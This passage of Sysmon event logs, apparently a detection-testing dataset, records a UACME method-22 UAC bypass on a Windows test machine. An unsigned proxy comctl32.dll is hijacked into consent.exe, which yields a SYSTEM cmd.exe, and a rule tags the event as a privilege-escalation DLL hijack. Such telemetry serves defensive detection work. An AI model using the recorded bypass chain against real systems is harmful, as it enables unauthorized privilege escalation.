"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": 
"747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": 
"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", 